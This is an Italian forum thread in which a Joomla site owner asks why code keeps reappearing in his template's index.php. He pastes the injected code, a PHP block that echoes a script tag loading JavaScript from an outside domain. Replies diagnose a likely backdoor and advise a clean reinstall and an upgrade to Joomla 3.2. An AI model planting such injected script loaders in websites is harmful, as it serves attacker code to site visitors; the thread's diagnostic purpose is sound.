Joomla.it Forum

Non solo Joomla... => Sicurezza => Topic aperto da: zorzside - 06 Nov 2013, 22:49:04

Titolo: Codice iFrame inserito nel template realizzato manualmente
Inserito da: zorzside - 06 Nov 2013, 22:49:04
Ciao a tutti ho questo problema, joomla aggiornato alla versione 1.5.26, tutti i moduli inutili disabilitati, tutti i template sono stati rimossi è lasciato solo quello da me creato. iscrizione utenti disabilitata.
ho applicato la patch a file.php e a media.php successiva alla versione 1.5.26
ci sono installati solo joomfish e oizogallery2


Eppure all'interno del file index.php del template ogni 2-3 giorni mi trovo un iframe interno, che poi non fa comparire niente sul sito, ma mi sballa tutto il flow del sito.


Avete idee di come bloccare definitivamente questo problema?


Copio il codice che trovo all'interno del file index del template.


Codice: [Seleziona]


<?php
#339810#
if(empty($bsr)) {
$bsr "<script src=\"http://astralight.com/moving.page/2ulYR1AB.php\" type=\"text/javascript\"></script>";
echo 
$bsr;
}


#/339810#
?>





function iFrameHeight() {
   var h = 0;
   if ( !document.all ) {
      h = document.getElementById('blockrandom').contentDocument.height;
      document.getElementById('blockrandom').style.height = h + 60 + 'px';
   } else if( document.all ) {
      h = document.frames('blockrandom').document.body.scrollHeight;
      document.all.blockrandom.style.height = h + 20 + 'px';
   }
}

Titolo: Re:Codice iFrame inserito nel template realizzato manualmente
Inserito da: mmleoni - 07 Nov 2013, 07:37:09
ciao,
 ci sono numerosi post in questa sezione per tali problemi, ti invito a leggerli.

in soldoni, la situazione è che, una volta che il sito è stato 'bucato', non ti puoi più fidare di niente che sia sul file system. è molto probabile che da qualche parte ci sia una shell o un cavallo di troia e l'unica soluzione è ripartire da un'installazione pulita salvando solo db ed immagini.

potrebbe essere una buona occasione per passare a J3.2

ciao,
marco

Titolo: Re:Codice iFrame inserito nel template realizzato manualmente
Inserito da: zorzside - 07 Nov 2013, 09:14:29
Ciao grazie, si ho letto un pò di altri post. un bel pò :)


pensavo di aver risolto definitivamente perchè da  1 attacco al giorno, ero arrivato a 1 solo a settimana.
ma penso anche io ci sia una bella backdoor.


per sicurezza cosa che mi ero dimenticato di fare ho cambiato password ftp.




ps:secondo te meglio una collaudata 2.5 lts o una 3.2 sts?

Titolo: Re:Codice iFrame inserito nel template realizzato manualmente
Inserito da: mmleoni - 07 Nov 2013, 09:30:49
se non hai esigenze particolari che impongano la 2.5 direi la 3.2. il supporto 3.x si estenderà a tutto il 2016, mentre quello per la 2.5 terminerà l'anno prossimo.

per esigenze particolari intendo, principalmente, componenti che non esistono ancora per 3.x ma che sono in porting o che presumibilmente verranno migrati (es VM2), non su cose che non ci saranno mai.

ciao

Titolo: Re:Codice iFrame inserito nel template realizzato manualmente
Inserito da: zorzside - 07 Nov 2013, 09:37:40
ho solo joomfish e oizo gallery.
il sito  è un mini sito con solo 5 pagine.


grazie ciao

Titolo: Re:Codice iFrame inserito nel template realizzato manualmente
Inserito da: mmleoni - 07 Nov 2013, 10:42:54
oizo? se lo sa alexred ti stozza  ;D ;D ;D

butta via joomfish e vai di J3.2!


ciao,
marco
Titolo: Re:Codice iFrame inserito nel template realizzato manualmente
Inserito da: zorzside - 07 Nov 2013, 10:54:05
oizo? se lo sa alexred ti stozza  ;D ;D ;D


Abbiamo trovato il problema? :D :D :D più bucato di un colapasta?
Titolo: Re:Codice iFrame inserito nel template realizzato manualmente
Inserito da: mmleoni - 07 Nov 2013, 11:00:08
no, non è bucato, è che il nome e 'ozio gallery' e non oizo come hai scritto tu.


questa gallery è l'orgoglio di alexred!! e, a dire il vero, anche io ho scritto degli algoritmi di lettura directories e generazione xml  per questo componente.

ciao,
marco